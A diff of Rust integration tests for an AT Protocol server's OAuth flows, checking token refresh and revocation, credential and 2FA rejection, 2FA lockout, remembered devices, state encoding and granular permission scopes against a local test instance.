("client_id", &client_id), 308 + ]) 309 + .send() 310 + .await 311 + .unwrap(); 312 assert_eq!(refresh_res.status(), StatusCode::OK); 313 let refresh_body: Value = refresh_res.json().await.unwrap(); 314 assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token); 315 + assert_ne!( 316 + refresh_body["refresh_token"].as_str().unwrap(), 317 + refresh_token 318 + ); 319 let introspect_res = http_client 320 .post(format!("{}/oauth/introspect", url)) 321 .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 322 + .send() 323 + .await 324 + .unwrap(); 325 assert_eq!(introspect_res.status(), StatusCode::OK); 326 let introspect_body: Value = introspect_res.json().await.unwrap(); 327 assert_eq!(introspect_body["active"], true); 328 let revoke_res = http_client 329 .post(format!("{}/oauth/revoke", url)) 330 .form(&[("token", refresh_body["refresh_token"].as_str().unwrap())]) 331 + .send() 332 + .await 333 + .unwrap(); 334 assert_eq!(revoke_res.status(), StatusCode::OK); 335 let introspect_after = http_client 336 .post(format!("{}/oauth/introspect", url)) 337 .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 338 + .send() 339 + .await 340 + .unwrap(); 341 let after_body: Value = introspect_after.json().await.unwrap(); 342 + assert_eq!( 343 + after_body["active"], false, 344 + "Revoked token should be inactive" 345 + ); 346 } 347 348 #[tokio::test] ··· 352 let ts = Utc::now().timestamp_millis(); 353 let handle = format!("wrong-creds-{}", ts); 354 let email = format!("wrong-creds-{}@example.com", ts); 355 + http_client 356 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 357 .json(&json!({ "handle": handle, "email": email, "password": "correct-password" })) 358 + .send() 359 + .await 360 + .unwrap(); 361 let redirect_uri = "https://example.com/callback"; 362 let mock_client = setup_mock_client_metadata(redirect_uri).await; 363 let client_id = mock_client.uri(); 364 let (_, code_challenge) = generate_pkce(); 365 let par_body: Value = http_client 366 .post(format!("{}/oauth/par", url)) 367 + .form(&[ 368 + ("response_type", "code"), 369 + ("client_id", &client_id), 370 + ("redirect_uri", redirect_uri), 371 + ("code_challenge", &code_challenge), 372 + ("code_challenge_method", "S256"), 373 + ]) 374 + .send() 375 + .await 376 + .unwrap() 377 + .json() 378 + .await 379 + .unwrap(); 380 let request_uri = par_body["request_uri"].as_str().unwrap(); 381 let auth_res = http_client 382 .post(format!("{}/oauth/authorize", url)) 383 + .header("Content-Type", "application/json") 384 .header("Accept", "application/json") 385 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "wrong-password", "remember_device": false})) 386 .send().await.unwrap(); 387 assert_eq!(auth_res.status(), StatusCode::FORBIDDEN); 388 let error_body: Value = auth_res.json().await.unwrap(); 389 assert_eq!(error_body["error"], "access_denied"); 390 let unsupported = http_client 391 .post(format!("{}/oauth/token", url)) 392 + .form(&[ 393 + ("grant_type", "client_credentials"), 394 + ("client_id", "https://example.com"), 395 + ]) 396 + .send() 397 + .await 398 + .unwrap(); 399 assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST); 400 let body: Value = unsupported.json().await.unwrap(); 401 assert_eq!(body["error"], "unsupported_grant_type"); 402 let invalid_refresh = http_client 403 .post(format!("{}/oauth/token", url)) 404 + .form(&[ 405 + ("grant_type", "refresh_token"), 406 + ("refresh_token", "invalid-token"), 407 + ("client_id", "https://example.com"), 408 + ]) 409 + .send() 410 + .await 411 + .unwrap(); 412 assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST); 413 let body: Value = invalid_refresh.json().await.unwrap(); 414 assert_eq!(body["error"], "invalid_grant"); 415 let invalid_introspect = http_client 416 .post(format!("{}/oauth/introspect", url)) 417 .form(&[("token", "invalid.token.here")]) 418 + .send() 419 + .await 420 + .unwrap(); 421 assert_eq!(invalid_introspect.status(), StatusCode::OK); 422 let body: Value = invalid_introspect.json().await.unwrap(); 423 assert_eq!(body["active"], false); ··· 425 .get(format!("{}/oauth/authorize", url)) 426 .header("Accept", "application/json") 427 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")]) 428 + .send() 429 + .await 430 + .unwrap(); 431 assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST); 432 } 433 ··· 442 let create_res = http_client 443 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 444 .json(&json!({ "handle": handle, "email": email, "password": password })) 445 + .send() 446 + .await 447 + .unwrap(); 448 assert_eq!(create_res.status(), StatusCode::OK); 449 let account: Value = create_res.json().await.unwrap(); 450 let user_did = account["did"].as_str().unwrap(); 451 verify_new_account(&http_client, user_did).await; 452 let db_url = get_db_connection_string().await; 453 + let pool = sqlx::postgres::PgPoolOptions::new() 454 + .max_connections(1) 455 + .connect(&db_url) 456 + .await 457 + .unwrap(); 458 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 459 + .bind(user_did) 460 + .execute(&pool) 461 + .await 462 + .unwrap(); 463 let redirect_uri = "https://example.com/2fa-callback"; 464 let mock_client = setup_mock_client_metadata(redirect_uri).await; 465 let client_id = mock_client.uri(); 466 let (code_verifier, code_challenge) = generate_pkce(); 467 let par_body: Value = http_client 468 .post(format!("{}/oauth/par", url)) 469 + .form(&[ 470 + ("response_type", "code"), 471 + ("client_id", &client_id), 472 + ("redirect_uri", redirect_uri), 473 + ("code_challenge", &code_challenge), 474 + ("code_challenge_method", "S256"), 475 + ]) 476 + .send() 477 + .await 478 + .unwrap() 479 + .json() 480 + .await 481 + .unwrap(); 482 let request_uri = par_body["request_uri"].as_str().unwrap(); 483 + let auth_res = http_client 484 .post(format!("{}/oauth/authorize", url)) 485 + .header("Content-Type", "application/json") 486 + .header("Accept", "application/json") 487 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 488 .send().await.unwrap(); 489 + assert_eq!( 490 + auth_res.status(), 491 + StatusCode::OK, 492 + "Should return OK with needs_2fa" 493 + ); 494 + let auth_body: Value = auth_res.json().await.unwrap(); 495 + assert!( 496 + auth_body["needs_2fa"].as_bool().unwrap_or(false), 497 + "Should need 2FA, got: {:?}", 498 + auth_body 499 + ); 500 let twofa_invalid = http_client 501 .post(format!("{}/oauth/authorize/2fa", url)) 502 + .header("Content-Type", "application/json") 503 + .json(&json!({"request_uri": request_uri, "code": "000000"})) 504 + .send() 505 + .await 506 + .unwrap(); 507 + assert_eq!(twofa_invalid.status(), StatusCode::FORBIDDEN); 508 + let body: Value = twofa_invalid.json().await.unwrap(); 509 + assert!( 510 + body["error_description"] 511 + .as_str() 512 + .unwrap_or("") 513 + .contains("Invalid") 514 + || body["error"].as_str().unwrap_or("") == "invalid_code" 515 + ); 516 + let twofa_code: String = 517 + sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 518 + .bind(request_uri) 519 + .fetch_one(&pool) 520 + .await 521 + .unwrap(); 522 + let twofa_res = http_client 523 .post(format!("{}/oauth/authorize/2fa", url)) 524 + .header("Content-Type", "application/json") 525 + .json(&json!({"request_uri": request_uri, "code": &twofa_code})) 526 + .send() 527 + .await 528 + .unwrap(); 529 + assert_eq!( 530 + twofa_res.status(), 531 + StatusCode::OK, 532 + "Valid 2FA code should succeed" 533 + ); 534 + let twofa_body: Value = twofa_res.json().await.unwrap(); 535 + let final_location = twofa_body["redirect_uri"].as_str().unwrap(); 536 assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 537 + let auth_code = final_location 538 + .split("code=") 539 + .nth(1) 540 + .unwrap() 541 + .split('&') 542 + .next() 543 + .unwrap(); 544 let token_res = http_client 545 .post(format!("{}/oauth/token", url)) 546 + .form(&[ 547 + ("grant_type", "authorization_code"), 548 + ("code", auth_code), 549 + ("redirect_uri", redirect_uri), 550 + ("code_verifier", &code_verifier), 551 + ("client_id", &client_id), 552 + ]) 553 + .send() 554 + .await 555 + .unwrap(); 556 assert_eq!(token_res.status(), StatusCode::OK); 557 let token_body: Value = token_res.json().await.unwrap(); 558 assert_eq!(token_body["sub"], user_did); ··· 569 let create_res = http_client 570 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 571 .json(&json!({ "handle": handle, "email": email, "password": password })) 572 + .send() 573 + .await 574 + .unwrap(); 575 let account: Value = create_res.json().await.unwrap(); 576 let user_did = account["did"].as_str().unwrap(); 577 verify_new_account(&http_client, user_did).await; 578 let db_url = get_db_connection_string().await; 579 + let pool = sqlx::postgres::PgPoolOptions::new() 580 + .max_connections(1) 581 + .connect(&db_url) 582 + .await 583 + .unwrap(); 584 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 585 + .bind(user_did) 586 + .execute(&pool) 587 + .await 588 + .unwrap(); 589 let redirect_uri = "https://example.com/2fa-lockout-callback"; 590 let mock_client = setup_mock_client_metadata(redirect_uri).await; 591 let client_id = mock_client.uri(); 592 let (_, code_challenge) = generate_pkce(); 593 let par_body: Value = http_client 594 .post(format!("{}/oauth/par", url)) 595 + .form(&[ 596 + ("response_type", "code"), 597 + ("client_id", &client_id), 598 + ("redirect_uri", redirect_uri), 599 + ("code_challenge", &code_challenge), 600 + ("code_challenge_method", "S256"), 601 + ]) 602 + .send() 603 + .await 604 + .unwrap() 605 + .json() 606 + .await 607 + .unwrap(); 608 let request_uri = par_body["request_uri"].as_str().unwrap(); 609 + let auth_res = http_client 610 .post(format!("{}/oauth/authorize", url)) 611 + .header("Content-Type", "application/json") 612 + .header("Accept", "application/json") 613 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 614 .send().await.unwrap(); 615 + assert_eq!( 616 + auth_res.status(), 617 + StatusCode::OK, 618 + "Should return OK with needs_2fa" 619 + ); 620 + let auth_body: Value = auth_res.json().await.unwrap(); 621 + assert!( 622 + auth_body["needs_2fa"].as_bool().unwrap_or(false), 623 + "Should need 2FA" 624 + ); 625 for i in 0..5 { 626 let res = http_client 627 .post(format!("{}/oauth/authorize/2fa", url)) 628 + .header("Content-Type", "application/json") 629 + .json(&json!({"request_uri": request_uri, "code": "999999"})) 630 + .send() 631 + .await 632 + .unwrap(); 633 if i < 4 { 634 + assert_eq!( 635 + res.status(), 636 + StatusCode::FORBIDDEN, 637 + "Attempt {} should return 403", 638 + i 639 + ); 640 } 641 } 642 let lockout_res = http_client 643 .post(format!("{}/oauth/authorize/2fa", url)) 644 + .header("Content-Type", "application/json") 645 + .json(&json!({"request_uri": request_uri, "code": "999999"})) 646 + .send() 647 + .await 648 + .unwrap(); 649 + let body: Value = lockout_res.json().await.unwrap(); 650 + let desc = body["error_description"].as_str().unwrap_or(""); 651 + assert!( 652 + desc.contains("Too many") || desc.contains("No 2FA") || body["error"] == "invalid_request", 653 + "Expected lockout error, got: {:?}", 654 + body 655 + ); 656 } 657 658 #[tokio::test] ··· 666 let create_res = http_client 667 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 668 .json(&json!({ "handle": handle, "email": email, "password": password })) 669 + .send() 670 + .await 671 + .unwrap(); 672 let account: Value = create_res.json().await.unwrap(); 673 let user_did = account["did"].as_str().unwrap().to_string(); 674 verify_new_account(&http_client, &user_did).await; ··· 678 let (code_verifier, code_challenge) = generate_pkce(); 679 let par_body: Value = http_client 680 .post(format!("{}/oauth/par", url)) 681 + .form(&[ 682 + ("response_type", "code"), 683 + ("client_id", &client_id), 684 + ("redirect_uri", redirect_uri), 685 + ("code_challenge", &code_challenge), 686 + ("code_challenge_method", "S256"), 687 + ]) 688 + .send() 689 + .await 690 + .unwrap() 691 + .json() 692 + .await 693 + .unwrap(); 694 let request_uri = par_body["request_uri"].as_str().unwrap(); 695 + let auth_res = http_client 696 .post(format!("{}/oauth/authorize", url)) 697 + .header("Content-Type", "application/json") 698 + .header("Accept", "application/json") 699 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": true})) 700 .send().await.unwrap(); 701 + assert_eq!( 702 + auth_res.status(), 703 + StatusCode::OK, 704 + "Expected OK with JSON response" 705 + ); 706 + let device_cookie = auth_res 707 + .headers() 708 + .get("set-cookie") 709 .and_then(|v| v.to_str().ok()) 710 .map(|s| s.split(';').next().unwrap_or("").to_string()) 711 .expect("Should have device cookie"); 712 + let auth_body: Value = auth_res.json().await.unwrap(); 713 + let mut location = auth_body["redirect_uri"] 714 + .as_str() 715 + .expect("Expected redirect_uri") 716 + .to_string(); 717 + if location.contains("/oauth/consent") { 718 + let consent_res = http_client 719 + .post(format!("{}/oauth/authorize/consent", url)) 720 + .header("Content-Type", "application/json") 721 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": true})) 722 + .send().await.unwrap(); 723 + assert_eq!( 724 + consent_res.status(), 725 + StatusCode::OK, 726 + "Consent should succeed" 727 + ); 728 + let consent_body: Value = consent_res.json().await.unwrap(); 729 + location = consent_body["redirect_uri"] 730 + .as_str() 731 + .expect("Expected redirect_uri from consent") 732 + .to_string(); 733 + } 734 assert!(location.contains("code=")); 735 + let code = location 736 + .split("code=") 737 + .nth(1) 738 + .unwrap() 739 + .split('&') 740 + .next() 741 + .unwrap(); 742 let _ = http_client 743 .post(format!("{}/oauth/token", url)) 744 + .form(&[ 745 + ("grant_type", "authorization_code"), 746 + ("code", code), 747 + ("redirect_uri", redirect_uri), 748 + ("code_verifier", &code_verifier), 749 + ("client_id", &client_id), 750 + ]) 751 + .send() 752 + .await 753 + .unwrap() 754 + .json::<Value>() 755 + .await 756 + .unwrap(); 757 let db_url = get_db_connection_string().await; 758 + let pool = sqlx::postgres::PgPoolOptions::new() 759 + .max_connections(1) 760 + .connect(&db_url) 761 + .await 762 + .unwrap(); 763 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 764 + .bind(&user_did) 765 + .execute(&pool) 766 + .await 767 + .unwrap(); 768 let (code_verifier2, code_challenge2) = generate_pkce(); 769 let par_body2: Value = http_client 770 .post(format!("{}/oauth/par", url)) 771 + .form(&[ 772 + ("response_type", "code"), 773 + ("client_id", &client_id), 774 + ("redirect_uri", redirect_uri), 775 + ("code_challenge", &code_challenge2), 776 + ("code_challenge_method", "S256"), 777 + ]) 778 + .send() 779 + .await 780 + .unwrap() 781 + .json() 782 + .await 783 + .unwrap(); 784 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 785 + let select_res = http_client 786 .post(format!("{}/oauth/authorize/select", url)) 787 .header("cookie", &device_cookie) 788 + .header("Content-Type", "application/json") 789 + .json(&json!({"request_uri": request_uri2, "did": &user_did})) 790 + .send() 791 + .await 792 + .unwrap(); 793 + assert_eq!( 794 + select_res.status(), 795 + StatusCode::OK, 796 + "Select should return OK with JSON" 797 + ); 798 + let select_body: Value = select_res.json().await.unwrap(); 799 + assert!( 800 + select_body["needs_2fa"].as_bool().unwrap_or(false), 801 + "Should need 2FA" 802 + ); 803 + let twofa_code: String = 804 + sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 805 + .bind(request_uri2) 806 + .fetch_one(&pool) 807 + .await 808 + .unwrap(); 809 + let twofa_res = http_client 810 .post(format!("{}/oauth/authorize/2fa", url)) 811 .header("cookie", &device_cookie) 812 + .header("Content-Type", "application/json") 813 + .json(&json!({"request_uri": request_uri2, "code": &twofa_code})) 814 + .send() 815 + .await 816 + .unwrap(); 817 + assert_eq!( 818 + twofa_res.status(), 819 + StatusCode::OK, 820 + "Valid 2FA should succeed" 821 + ); 822 + let twofa_body: Value = twofa_res.json().await.unwrap(); 823 + let final_location = twofa_body["redirect_uri"].as_str().unwrap(); 824 assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 825 + let final_code = final_location 826 + .split("code=") 827 + .nth(1) 828 + .unwrap() 829 + .split('&') 830 + .next() 831 + .unwrap(); 832 let token_res = http_client 833 .post(format!("{}/oauth/token", url)) 834 + .form(&[ 835 + ("grant_type", "authorization_code"), 836 + ("code", final_code), 837 + ("redirect_uri", redirect_uri), 838 + ("code_verifier", &code_verifier2), 839 + ("client_id", &client_id), 840 + ]) 841 + .send() 842 + .await 843 + .unwrap(); 844 assert_eq!(token_res.status(), StatusCode::OK); 845 let final_token: Value = token_res.json().await.unwrap(); 846 assert_eq!(final_token["sub"], user_did); ··· 857 let create_res = http_client 858 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 859 .json(&json!({ "handle": handle, "email": email, "password": password })) 860 + .send() 861 + .await 862 + .unwrap(); 863 let account: Value = create_res.json().await.unwrap(); 864 verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 865 let redirect_uri = "https://example.com/state-special-callback"; ··· 869 let special_state = "state=with&special=chars&plus+more"; 870 let par_body: Value = http_client 871 .post(format!("{}/oauth/par", url)) 872 + .form(&[ 873 + ("response_type", "code"), 874 + ("client_id", &client_id), 875 + ("redirect_uri", redirect_uri), 876 + ("code_challenge", &code_challenge), 877 + ("code_challenge_method", "S256"), 878 + ("state", special_state), 879 + ]) 880 + .send() 881 + .await 882 + .unwrap() 883 + .json() 884 + .await 885 + .unwrap(); 886 let request_uri = par_body["request_uri"].as_str().unwrap(); 887 + let auth_res = http_client 888 .post(format!("{}/oauth/authorize", url)) 889 + .header("Content-Type", "application/json") 890 + .header("Accept", "application/json") 891 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 892 .send().await.unwrap(); 893 + assert_eq!( 894 + auth_res.status(), 895 + StatusCode::OK, 896 + "Expected OK with JSON response" 897 + ); 898 + let auth_body: Value = auth_res.json().await.unwrap(); 899 + let mut location = auth_body["redirect_uri"] 900 + .as_str() 901 + .expect("Expected redirect_uri") 902 + .to_string(); 903 + if location.contains("/oauth/consent") { 904 + let consent_res = http_client 905 + .post(format!("{}/oauth/authorize/consent", url)) 906 + .header("Content-Type", "application/json") 907 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 908 + .send().await.unwrap(); 909 + assert_eq!( 910 + consent_res.status(), 911 + StatusCode::OK, 912 + "Consent should succeed" 913 + ); 914 + let consent_body: Value = consent_res.json().await.unwrap(); 915 + location = consent_body["redirect_uri"] 916 + .as_str() 917 + .expect("Expected redirect_uri from consent") 918 + .to_string(); 919 + } 920 assert!(location.contains("state=")); 921 let encoded_state = urlencoding::encode(special_state); 922 + assert!( 923 + location.contains(&format!("state={}", encoded_state)), 924 + "State should be URL-encoded. Got: {}", 925 + location 926 + ); 927 + } 928 + 929 + async fn get_oauth_token_with_scope(scope: &str) -> (String, String, String) { 930 + let url = base_url().await; 931 + let http_client = client(); 932 + let ts = Utc::now().timestamp_millis(); 933 + let handle = format!("scope-test-{}", ts); 934 + let email = format!("scope-test-{}@example.com", ts); 935 + let password = "scope-test-password"; 936 + let create_res = http_client 937 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 938 + .json(&json!({ "handle": handle, "email": email, "password": password })) 939 + .send() 940 + .await 941 + .unwrap(); 942 + assert_eq!(create_res.status(), StatusCode::OK); 943 + let account: Value = create_res.json().await.unwrap(); 944 + let user_did = account["did"].as_str().unwrap().to_string(); 945 + verify_new_account(&http_client, &user_did).await; 946 + let redirect_uri = "https://example.com/scope-callback"; 947 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 948 + let client_id = mock_client.uri(); 949 + let (code_verifier, code_challenge) = generate_pkce(); 950 + let par_res = http_client 951 + .post(format!("{}/oauth/par", url)) 952 + .form(&[ 953 + ("response_type", "code"), 954 + ("client_id", &client_id), 955 + ("redirect_uri", redirect_uri), 956 + ("code_challenge", &code_challenge), 957 + ("code_challenge_method", "S256"), 958 + ("scope", scope), 959 + ("state", "test"), 960 + ]) 961 + .send() 962 + .await 963 + .unwrap(); 964 + assert_eq!( 965 + par_res.status(), 966 + StatusCode::CREATED, 967 + "PAR should succeed for scope: {}", 968 + scope 969 + ); 970 + let par_body: Value = par_res.json().await.unwrap(); 971 + let request_uri = par_body["request_uri"].as_str().unwrap(); 972 + let auth_res = http_client 973 + .post(format!("{}/oauth/authorize", url)) 974 + .header("Content-Type", "application/json") 975 + .header("Accept", "application/json") 976 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 977 + .send().await.unwrap(); 978 + assert_eq!(auth_res.status(), StatusCode::OK); 979 + let auth_body: Value = auth_res.json().await.unwrap(); 980 + let mut location = auth_body["redirect_uri"] 981 + .as_str() 982 + .expect("Expected redirect_uri") 983 + .to_string(); 984 + if location.contains("/oauth/consent") { 985 + let approved_scopes: Vec<&str> = scope.split_whitespace().collect(); 986 + let consent_res = http_client 987 + .post(format!("{}/oauth/authorize/consent", url)) 988 + .header("Content-Type", "application/json") 989 + .json(&json!({"request_uri": request_uri, "approved_scopes": approved_scopes, "remember": false})) 990 + .send().await.unwrap(); 991 + let consent_status = consent_res.status(); 992 + let consent_body: Value = consent_res.json().await.unwrap(); 993 + assert_eq!( 994 + consent_status, 995 + StatusCode::OK, 996 + "Consent should succeed. Scope: {}, Body: {:?}", 997 + scope, 998 + consent_body 999 + ); 1000 + location = consent_body["redirect_uri"] 1001 + .as_str() 1002 + .expect("Expected redirect_uri from consent") 1003 + .to_string(); 1004 + } 1005 + let code = location 1006 + .split("code=") 1007 + .nth(1) 1008 + .unwrap() 1009 + .split('&') 1010 + .next() 1011 + .unwrap(); 1012 + let token_res = http_client 1013 + .post(format!("{}/oauth/token", url)) 1014 + .form(&[ 1015 + ("grant_type", "authorization_code"), 1016 + ("code", code), 1017 + ("redirect_uri", redirect_uri), 1018 + ("code_verifier", &code_verifier), 1019 + ("client_id", &client_id), 1020 + ]) 1021 + .send() 1022 + .await 1023 + .unwrap(); 1024 + assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed"); 1025 + let token_body: Value = token_res.json().await.unwrap(); 1026 + let access_token = token_body["access_token"].as_str().unwrap().to_string(); 1027 + (access_token, user_did, handle) 1028 + } 1029 + 1030 + #[tokio::test] 1031 + async fn test_granular_scope_repo_create_only() { 1032 + let url = base_url().await; 1033 + let http_client = client(); 1034 + let (token, did, _) = 1035 + get_oauth_token_with_scope("repo:app.bsky.feed.post?action=create blob:*/*").await; 1036 + let now = chrono::Utc::now().to_rfc3339(); 1037 + let create_res = http_client 1038 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1039 + .bearer_auth(&token) 1040 + .json(&json!({ 1041 + "repo": &did, 1042 + "collection": "app.bsky.feed.post", 1043 + "record": { "$type": "app.bsky.feed.post", "text": "test post", "createdAt": now } 1044 + })) 1045 + .send() 1046 + .await 1047 + .unwrap(); 1048 + assert_eq!( 1049 + create_res.status(), 1050 + StatusCode::OK, 1051 + "Should allow creating posts with repo:app.bsky.feed.post?action=create" 1052 + ); 1053 + let body: Value = create_res.json().await.unwrap(); 1054 + let uri = body["uri"].as_str().expect("Should have uri"); 1055 + let rkey = uri.split('/').last().unwrap(); 1056 + let delete_res = http_client 1057 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 1058 + .bearer_auth(&token) 1059 + .json(&json!({ "repo": &did, "collection": "app.bsky.feed.post", "rkey": rkey })) 1060 + .send() 1061 + .await 1062 + .unwrap(); 1063 + assert_eq!( 1064 + delete_res.status(), 1065 + StatusCode::FORBIDDEN, 1066 + "Should NOT allow deleting with create-only scope" 1067 + ); 1068 + let like_res = http_client 1069 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1070 + .bearer_auth(&token) 1071 + .json(&json!({ 1072 + "repo": &did, 1073 + "collection": "app.bsky.feed.like", 1074 + "record": { "$type": "app.bsky.feed.like", "subject": { "uri": uri, "cid": body["cid"] }, "createdAt": now } 1075 + })) 1076 + .send().await.unwrap(); 1077 + assert_eq!( 1078 + like_res.status(), 1079 + StatusCode::FORBIDDEN, 1080 + "Should NOT allow creating likes (wrong collection)" 1081 + ); 1082 + } 1083 + 1084 + #[tokio::test] 1085 + async fn test_granular_scope_wildcard_collection() { 1086 + let url = base_url().await; 1087 + let http_client = client(); 1088 + let (token, did, _) = get_oauth_token_with_scope( 1089 + "repo:app.bsky.*?action=create&action=update&action=delete blob:*/*", 1090 + ) 1091 + .await; 1092 + let now = chrono::Utc::now().to_rfc3339(); 1093 + let post_res = http_client 1094 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1095 + .bearer_auth(&token) 1096 + .json(&json!({ 1097 + "repo": &did, 1098 + "collection": "app.bsky.feed.post", 1099 + "record": { "$type": "app.bsky.feed.post", "text": "wildcard test", "createdAt": now } 1100 + })) 1101 + .send() 1102 + .await 1103 + .unwrap(); 1104 + assert_eq!( 1105 + post_res.status(), 1106 + StatusCode::OK, 1107 + "Should allow app.bsky.feed.post with app.bsky.* scope" 1108 + ); 1109 + let body: Value = post_res.json().await.unwrap(); 1110 + let uri = body["uri"].as_str().unwrap(); 1111 + let rkey = uri.split('/').last().unwrap(); 1112 + let delete_res = http_client 1113 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 1114 + .bearer_auth(&token) 1115 + .json(&json!({ "repo": &did, "collection": "app.bsky.feed.post", "rkey": rkey })) 1116 + .send() 1117 + .await 1118 + .unwrap(); 1119 + assert_eq!( 1120 + delete_res.status(), 1121 + StatusCode::OK, 1122 + "Should allow delete with action=delete" 1123 + ); 1124 + let other_res = http_client 1125 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1126 + .bearer_auth(&token) 1127 + .json(&json!({ 1128 + "repo": &did, 1129 + "collection": "com.example.record", 1130 + "record": { "$type": "com.example.record", "data": "test", "createdAt": now } 1131 + })) 1132 + .send() 1133 + .await 1134 + .unwrap(); 1135 + assert_eq!( 1136 + other_res.status(), 1137 + StatusCode::FORBIDDEN, 1138 + "Should NOT allow com.example.* with app.bsky.* scope" 1139 + ); 1140 + } 1141 + 1142 + #[tokio::test] 1143 + async fn test_granular_scope_email_read() { 1144 + let url = base_url().await; 1145 + let http_client = client(); 1146 + let (token, did, _) = get_oauth_token_with_scope("account:email?action=read").await; 1147 + let session_res = http_client 1148 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1149 + .bearer_auth(&token) 1150 + .send() 1151 + .await 1152 + .unwrap(); 1153 + assert_eq!(session_res.status(), StatusCode::OK); 1154 + let body: Value = session_res.json().await.unwrap(); 1155 + assert_eq!(body["did"], did); 1156 + assert!( 1157 + body["email"].is_string(), 1158 + "Email should be visible with account:email?action=read. Got: {:?}", 1159 + body 1160 + ); 1161 + } 1162 + 1163 + #[tokio::test] 1164 + async fn test_granular_scope_no_email_access() { 1165 + let url = base_url().await; 1166 + let http_client = client(); 1167 + let (token, did, _) = get_oauth_token_with_scope("repo:*?action=create blob:*/*").await; 1168 + let session_res = http_client 1169 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1170 + .bearer_auth(&token) 1171 + .send() 1172 + .await 1173 + .unwrap(); 1174 + assert_eq!(session_res.status(), StatusCode::OK); 1175 + let body: Value = session_res.json().await.unwrap(); 1176 + assert_eq!(body["did"], did); 1177 + assert!( 1178 + body["email"].is_null() || body.get("email").is_none(), 1179 + "Email should be hidden without account:email scope. Got: {:?}", 1180 + body["email"] 1181 + ); 1182 + } 1183 + 1184 + #[tokio::test] 1185 + async fn test_granular_scope_rpc_specific_method() { 1186 + let url = base_url().await; 1187 + let http_client = client(); 1188 + let (token, _, _) = get_oauth_token_with_scope("rpc:app.bsky.feed.getTimeline?aud=*").await; 1189 + let allowed_res = http_client 1190 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url)) 1191 + .bearer_auth(&token) 1192 + .query(&[ 1193 + ("aud", "did:web:api.bsky.app"), 1194 + ("lxm", "app.bsky.feed.getTimeline"), 1195 + ]) 1196 + .send() 1197 + .await 1198 + .unwrap(); 1199 + assert_eq!( 1200 + allowed_res.status(), 1201 + StatusCode::OK, 1202 + "Should allow getServiceAuth for app.bsky.feed.getTimeline" 1203 + ); 1204 + let body: Value = allowed_res.json().await.unwrap(); 1205 + assert!(body["token"].is_string(), "Should return service token"); 1206 + let blocked_res = http_client 1207 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url)) 1208 + .bearer_auth(&token) 1209 + .query(&[ 1210 + ("aud", "did:web:api.bsky.app"), 1211 + ("lxm", "app.bsky.feed.getAuthorFeed"), 1212 + ]) 1213 + .send() 1214 + .await 1215 + .unwrap(); 1216 + assert_eq!( 1217 + blocked_res.status(), 1218 + StatusCode::FORBIDDEN, 1219 + "Should NOT allow getServiceAuth for app.bsky.feed.getAuthorFeed" 1220 + ); 1221 + let blocked_body: Value = blocked_res.json().await.unwrap(); 1222 + assert!( 1223 + blocked_body["error"] 1224 + .as_str() 1225 + .unwrap_or("") 1226 + .contains("Scope") 1227 + || blocked_body["message"] 1228 + .as_str() 1229 + .unwrap_or("") 1230 + .contains("scope"), 1231 + "Should mention scope restriction: {:?}", 1232 + blocked_body 1233 + ); 1234 + let no_lxm_res = http_client 1235 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url)) 1236 + .bearer_auth(&token) 1237 + .query(&[("aud", "did:web:api.bsky.app")]) 1238 + .send() 1239 + .await 1240 + .unwrap(); 1241 + assert_eq!( 1242 + no_lxm_res.status(), 1243 + StatusCode::BAD_REQUEST, 1244 + "Should require lxm parameter for granular scopes" 1245 + ); 1246 }
+66 -27
tests/oauth_client_metadata.rs
